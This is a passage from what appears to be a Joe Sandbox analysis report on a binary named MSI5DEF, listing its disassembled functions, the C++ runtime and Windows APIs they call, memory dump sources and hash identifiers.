                                                                          • Part of subcall function 00AF7CB2: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7D34
                                                                          • Part of subcall function 00AF7C1D: __EH_prolog3.LIBCMT ref: 00AF7C24
                                                                          • Part of subcall function 00AF7C1D: std::_Lockit::_Lockit.LIBCPMT ref: 00AF7C2E
                                                                          • Part of subcall function 00AF7C1D: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7C9F
                                                                          • Part of subcall function 00AF4403: __EH_prolog3.LIBCMT ref: 00AF440A
                                                                          • Part of subcall function 00AF4403: std::_Lockit::_Lockit.LIBCPMT ref: 00AF4414
                                                                          • Part of subcall function 00AF4403: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF44BB
                                                                        • collate.LIBCPMT ref: 00AFDA78
                                                                        • numpunct.LIBCPMT ref: 00AFDCF2
                                                                          • Part of subcall function 00AF838F: __EH_prolog3.LIBCMT ref: 00AF8396
                                                                          • Part of subcall function 00AF80C5: __EH_prolog3.LIBCMT ref: 00AF80CC
                                                                          • Part of subcall function 00AF80C5: std::_Lockit::_Lockit.LIBCPMT ref: 00AF80D6
                                                                          • Part of subcall function 00AF80C5: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF8147
                                                                          • Part of subcall function 00AF81EF: __EH_prolog3.LIBCMT ref: 00AF81F6
                                                                          • Part of subcall function 00AF81EF: std::_Lockit::_Lockit.LIBCPMT ref: 00AF8200
                                                                          • Part of subcall function 00AF81EF: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF8271
                                                                          • Part of subcall function 00AF4403: Concurrency::cancel_current_task.LIBCPMT ref: 00AF44C6
                                                                          • Part of subcall function 00AF75B6: __EH_prolog3.LIBCMT ref: 00AF75BD
                                                                          • Part of subcall function 00AF75B6: std::_Lockit::_Lockit.LIBCPMT ref: 00AF75C7
                                                                          • Part of subcall function 00AF75B6: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7638
                                                                        • __Getcoll.LIBCPMT ref: 00AFDAB8
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                          • Part of subcall function 00AE84C0: LocalAlloc.KERNEL32(00000040,00000000,00B0839D,00000000,1816BA6E,?,00000000,?,00000000,?,00B2CB8D,000000FF,?,00AE17D5,00000000,00B2D3BA), ref: 00AE84C6
                                                                        • codecvt.LIBCPMT ref: 00AFDDA3
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$H_prolog3$Lockit::_Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatectypenumpunct
                                                                        • String ID:
                                                                        • API String ID: 613171289-0
                                                                        • Opcode ID: c87e984d5282d86b64ab2c4aad2688fc41f15ba5d6147ff04230ff98e784adf2
                                                                        • Instruction ID: e11163b25a4b77d4c38a32340817bb95256418dc5edf49e5529200b3dbcafd4e
                                                                        • Opcode Fuzzy Hash: c87e984d5282d86b64ab2c4aad2688fc41f15ba5d6147ff04230ff98e784adf2
                                                                        • Instruction Fuzzy Hash: 56E1F27280021EAFDB12AFE58D0267F7EB6EF45390F15446DFA586B281EF708D109791
                                                                        Function 00AFD8F2 Relevance: 9.3, APIs: 6, Instructions: 346COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AFD8FD
                                                                        • ctype.LIBCPMT ref: 00AFD944
                                                                          • Part of subcall function 00AFD458: __Getctype.LIBCPMT ref: 00AFD467
                                                                        • collate.LIBCPMT ref: 00AFDA78
                                                                        • __Getcoll.LIBCPMT ref: 00AFDAB8
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                          • Part of subcall function 00AE84C0: LocalAlloc.KERNEL32(00000040,00000000,00B0839D,00000000,1816BA6E,?,00000000,?,00000000,?,00B2CB8D,000000FF,?,00AE17D5,00000000,00B2D3BA), ref: 00AE84C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$AllocGetcollGetctypeH_prolog3LocalLockit::_Lockit::~_collatectype
                                                                        • String ID:
                                                                        • API String ID: 735909071-0
                                                                        • Opcode ID: 95811ee3d7f9f051cb7f096fb964795fd3c1b9835bd058a34932ce4bc2bb43db
                                                                        • Instruction ID: cec1e9bc1565eca5f4cf46223a881631cae03b9cb011ea58523b1fe0515f364e
                                                                        • Opcode Fuzzy Hash: 95811ee3d7f9f051cb7f096fb964795fd3c1b9835bd058a34932ce4bc2bb43db
                                                                        • Instruction Fuzzy Hash: A4C1C1B280461E9FDB12AFE589026BF7EB6FF45390F24841DFA586B281DF708910D791
                                                                        Function 00AE2BD0 Relevance: 9.2, APIs: 6, Instructions: 225encryptionCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • #224.MSI(?,00000001,00000000,00000000,00000000), ref: 00AE2C43
                                                                        • LocalFree.KERNEL32(?), ref: 00AE2CA2
                                                                        • LocalFree.KERNEL32(?), ref: 00AE2D0C
                                                                        • CertFreeCertificateContext.CRYPT32(00000000), ref: 00AE2E94
                                                                          • Part of subcall function 00AE3D60: CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 00AE3DA3
                                                                        • LocalFree.KERNEL32(?), ref: 00AE2E13
                                                                        • LocalFree.KERNEL32(?), ref: 00AE2E6B
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Local$Cert$#224CertificateContextNameString
                                                                        • String ID:
                                                                        • API String ID: 2665452496-0
                                                                        • Opcode ID: 384749e8814197e9cd6acdfcceb0c19d7daab129c00989c0cc02639a3087a0d1
                                                                        • Instruction ID: d1fc2493d825fc5484f8a03babc3c93830edebc92454faa3ef72a32e60c1584a
                                                                        • Opcode Fuzzy Hash: 384749e8814197e9cd6acdfcceb0c19d7daab129c00989c0cc02639a3087a0d1
                                                                        • Instruction Fuzzy Hash: E4919D70910289CFDB18CFA9C958B9EBBF5FF84304F24465DD015AB291DBB5AA84CB90
                                                                        Function 00AEB500 Relevance: 9.2, APIs: 6, Instructions: 152COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEB52D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEB550
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB578
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AEB5ED
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB617
                                                                        • LocalFree.KERNEL32 ref: 00AEB6C0
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_FreeLocalRegister
                                                                        • String ID:
                                                                        • API String ID: 1378673503-0
                                                                        • Opcode ID: 8d600ce2af344f19a9ca7b78b360fb360a95305306bc81066ff0a1c846e3577a
                                                                        • Instruction ID: 340cbc47e2d40d935983d33d9bc5c71538223711cb0c97d82799adeba06d4808
                                                                        • Opcode Fuzzy Hash: 8d600ce2af344f19a9ca7b78b360fb360a95305306bc81066ff0a1c846e3577a
                                                                        • Instruction Fuzzy Hash: 5851CE71810699DFCB20DF99D945BAEBBF4FB05320F144769E825A7390DB70AE04CBA1
                                                                        Function 00B15981 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 369COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16
                                                                        • String ID: a/p$am/pm
                                                                        • API String ID: 3509577899-3206640213
                                                                        • Opcode ID: f52ba3667fe19c45eb8a136ed9d4471eb6d3c9fef785bbfacf9d3da473a48a45
                                                                        • Instruction ID: 28e19efe61c70414099978fe1cd68f1e7724a68ce5e21339267d088a1342763c
                                                                        • Opcode Fuzzy Hash: f52ba3667fe19c45eb8a136ed9d4471eb6d3c9fef785bbfacf9d3da473a48a45
                                                                        • Instruction Fuzzy Hash: 68C1F471914A06DBCB348F68D889AFAB7F0FF86314FA441E9E501AB654D3319DC1CBA1
                                                                        Function 00B0AEF5 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,00B0AEEC,00B09710,00B085A3), ref: 00B0AF03
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B0AF11
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B0AF2A
                                                                        • SetLastError.KERNEL32(00000000,00B0AEEC,00B09710,00B085A3), ref: 00B0AF7C
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastValue___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 3852720340-0
                                                                        • Opcode ID: 266147a4c242c6bf588a18f510c3bbcde08af698cb70ad4138334969bd313f6c
                                                                        • Instruction ID: 5d45e6625c1fb1cd44da30edc651ea7b9cf73db67a860564a7364c928d5d5eba
                                                                        • Opcode Fuzzy Hash: 266147a4c242c6bf588a18f510c3bbcde08af698cb70ad4138334969bd313f6c
                                                                        • Instruction Fuzzy Hash: C201D47210D3226EE66427757C86B5A6ED5EB12B7072007A9F110E71F2EF919E016145
                                                                        Function 00AFD38D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Mpunct$GetvalsH_prolog3
                                                                        • String ID: $+xv
                                                                        • API String ID: 2204710431-1686923651
                                                                        • Opcode ID: 7c9c670211423c87a7273819361dec83b087a49f350b2a33869e6d866b4be112
                                                                        • Instruction ID: 33969bdb37517964050fd98d09d0e4a722fab61a11fab87edb1f535f3b2b33f5
                                                                        • Opcode Fuzzy Hash: 7c9c670211423c87a7273819361dec83b087a49f350b2a33869e6d866b4be112
                                                                        • Instruction Fuzzy Hash: 4A21B2B1904B966ED726DFB4849077BBFF8AB0C300B040A5AF199C7A42E734E601CB90
                                                                        Function 00AE83E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(1816BA6E,1816BA6E,?,?,00000000,00B2A221,000000FF), ref: 00AE847B
                                                                          • Part of subcall function 00B07875: EnterCriticalSection.KERNEL32(00B44AF8,00000000,?,?,00AE25B6,00B4571C,1816BA6E,?,00000000,00B293ED,000000FF,?,00AE1A26), ref: 00B07880
                                                                          • Part of subcall function 00B07875: LeaveCriticalSection.KERNEL32(00B44AF8,?,?,00AE25B6,00B4571C,1816BA6E,?,00000000,00B293ED,000000FF,?,00AE1A26,?,?,?,1816BA6E), ref: 00B078BD
                                                                        • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00AE8440
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AE8447
                                                                          • Part of subcall function 00B0782B: EnterCriticalSection.KERNEL32(00B44AF8,?,?,00AE2627,00B4571C,00B2CCC0), ref: 00B07835
                                                                          • Part of subcall function 00B0782B: LeaveCriticalSection.KERNEL32(00B44AF8,?,?,00AE2627,00B4571C,00B2CCC0), ref: 00B07868
                                                                          • Part of subcall function 00B0782B: RtlWakeAllConditionVariable.NTDLL ref: 00B078DF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                        • String ID: IsWow64Process$kernel32
                                                                        • API String ID: 2056477612-3789238822
                                                                        • Opcode ID: da6d82f7a9dd9922a58a5b5c0a5b296b890b3fefea304d70b989ed74a666d4bb
                                                                        • Instruction ID: 48848d365e1b6cdb90bc95a678957ada22f60d53eb995636dd2538eb5c5d61eb
                                                                        • Opcode Fuzzy Hash: da6d82f7a9dd9922a58a5b5c0a5b296b890b3fefea304d70b989ed74a666d4bb
                                                                        • Instruction Fuzzy Hash: 2E11A2B6D44B45EFCB20CFA4EC05B99BBE8F709720F1046AAE815932D0DF35AA00CA51
                                                                        Function 00B18461 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,1816BA6E,?,?,00000000,00B2CBE4,000000FF,?,00B183F1,?,?,00B183C5,?), ref: 00B18496
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B184A8
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,00B2CBE4,000000FF,?,00B183F1,?,?,00B183C5,?), ref: 00B184CA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        • Opcode ID: b80b8a89db39e1d256ad7802bb6923b5541ac2aa8d8bd04d5d9cba8cc17de934
                                                                        • Instruction ID: 290c695165753af1767e82a3fc117f95e62604bba9a2c3d598d37620befa07bf
                                                                        • Opcode Fuzzy Hash: b80b8a89db39e1d256ad7802bb6923b5541ac2aa8d8bd04d5d9cba8cc17de934
                                                                        • Instruction Fuzzy Hash: 6901AD31904A29ABDB118F54DC09BEEBBF8FB08B11F004665E811A36A0DF749900CA90
                                                                        Function 00AFDDD2 Relevance: 7.9, APIs: 5, Instructions: 433COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AFDDD9
                                                                        • collate.LIBCPMT ref: 00AFDF54
                                                                        • numpunct.LIBCPMT ref: 00AFE1CE
                                                                          • Part of subcall function 00AF83C2: __EH_prolog3.LIBCMT ref: 00AF83C9
                                                                          • Part of subcall function 00AF815A: __EH_prolog3.LIBCMT ref: 00AF8161
                                                                          • Part of subcall function 00AF815A: std::_Lockit::_Lockit.LIBCPMT ref: 00AF816B
                                                                          • Part of subcall function 00AF815A: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF81DC
                                                                          • Part of subcall function 00AEEAF0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEEB1D
                                                                          • Part of subcall function 00AEEAF0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEEB40
                                                                          • Part of subcall function 00AEEAF0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEEB68
                                                                          • Part of subcall function 00AEEAF0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEEC07
                                                                          • Part of subcall function 00AF4403: Concurrency::cancel_current_task.LIBCPMT ref: 00AF44C6
                                                                          • Part of subcall function 00AF764B: __EH_prolog3.LIBCMT ref: 00AF7652
                                                                          • Part of subcall function 00AF764B: std::_Lockit::_Lockit.LIBCPMT ref: 00AF765C
                                                                          • Part of subcall function 00AF764B: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF76CD
                                                                        • __Getcoll.LIBCPMT ref: 00AFDF94
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                          • Part of subcall function 00AE84C0: LocalAlloc.KERNEL32(00000040,00000000,00B0839D,00000000,1816BA6E,?,00000000,?,00000000,?,00B2CB8D,000000FF,?,00AE17D5,00000000,00B2D3BA), ref: 00AE84C6
                                                                          • Part of subcall function 00AEB9E0: __Getctype.LIBCPMT ref: 00AEB9EB
                                                                          • Part of subcall function 00AF7A5E: __EH_prolog3.LIBCMT ref: 00AF7A65
                                                                          • Part of subcall function 00AF7A5E: std::_Lockit::_Lockit.LIBCPMT ref: 00AF7A6F
                                                                          • Part of subcall function 00AF7A5E: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7AE0
                                                                          • Part of subcall function 00AF7B88: __EH_prolog3.LIBCMT ref: 00AF7B8F
                                                                          • Part of subcall function 00AF7B88: std::_Lockit::_Lockit.LIBCPMT ref: 00AF7B99
                                                                          • Part of subcall function 00AF7B88: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7C0A
                                                                          • Part of subcall function 00AF7DDC: __EH_prolog3.LIBCMT ref: 00AF7DE3
                                                                          • Part of subcall function 00AF7DDC: std::_Lockit::_Lockit.LIBCPMT ref: 00AF7DED
                                                                          • Part of subcall function 00AF7DDC: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7E5E
                                                                          • Part of subcall function 00AF7D47: __EH_prolog3.LIBCMT ref: 00AF7D4E
                                                                          • Part of subcall function 00AF7D47: std::_Lockit::_Lockit.LIBCPMT ref: 00AF7D58
                                                                          • Part of subcall function 00AF7D47: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7DC9
                                                                          • Part of subcall function 00AF4403: __EH_prolog3.LIBCMT ref: 00AF440A
                                                                          • Part of subcall function 00AF4403: std::_Lockit::_Lockit.LIBCPMT ref: 00AF4414
                                                                          • Part of subcall function 00AF4403: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF44BB
                                                                        • codecvt.LIBCPMT ref: 00AFE27F
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatenumpunct
                                                                        • String ID:
                                                                        • API String ID: 2252558201-0
                                                                        • Opcode ID: dd633218912352d6630e403b56112e70d36438235bee3b52a946a9544ee62222
                                                                        • Instruction ID: d964d62098f56afb174bc06179d2dd923772b5b4638bd48e9057a80981c68653
                                                                        • Opcode Fuzzy Hash: dd633218912352d6630e403b56112e70d36438235bee3b52a946a9544ee62222
                                                                        • Instruction Fuzzy Hash: CCE1F2B180021EAFDB22AFE58D02ABF7EB5EF55350F10452DFA586B291EF308D109791
                                                                        Function 00B1C382 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __alloca_probe_16.LIBCMT ref: 00B1C409
                                                                        • __alloca_probe_16.LIBCMT ref: 00B1C4CA
                                                                        • __freea.LIBCMT ref: 00B1C531
                                                                          • Part of subcall function 00B1B127: HeapAlloc.KERNEL32(00000000,?,?,?,00B1AAAA,?,00000000,?,00B0C282,?,?,?,?,?,?,00AE1668), ref: 00B1B159
                                                                        • __freea.LIBCMT ref: 00B1C546
                                                                        • __freea.LIBCMT ref: 00B1C556
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                        • String ID:
                                                                        • API String ID: 1096550386-0
                                                                        • Opcode ID: 68792685a7211e3b3520e25abed038c4b51808af3caa3ffc9a16572e37f400d4
                                                                        • Instruction ID: d8121122cc17050217b18bfecc03ac24d55559505132ed72d6c9164b2e9bfe44
                                                                        • Opcode Fuzzy Hash: 68792685a7211e3b3520e25abed038c4b51808af3caa3ffc9a16572e37f400d4
                                                                        • Instruction Fuzzy Hash: ED51C472640116AFEF215F64DC82EFF7EE9EF54354B9501A8FD08D6241EB30ED9086A0
                                                                        Function 00AEC590 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEC5BD
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEC5E0
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEC608
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AEC67D
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEC6A7
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                        • String ID:
                                                                        • API String ID: 459529453-0
                                                                        • Opcode ID: 78a16a2ba9d5609fc58c0491c22ef86bd4f5c323e3a6d131226c9795cea1743f
                                                                        • Instruction ID: e5ac357ed730b0842dcfe68eb841684962abe3f89884ce76c0d8a37346c54591
                                                                        • Opcode Fuzzy Hash: 78a16a2ba9d5609fc58c0491c22ef86bd4f5c323e3a6d131226c9795cea1743f
                                                                        • Instruction Fuzzy Hash: B241DF75800699DFCF11DFA8D940BAEBBB4FF05320F184269E914AB391DB34AE05CB91
                                                                        Function 00AEEAF0 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEEB1D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEEB40
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEEB68
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AEEBDD
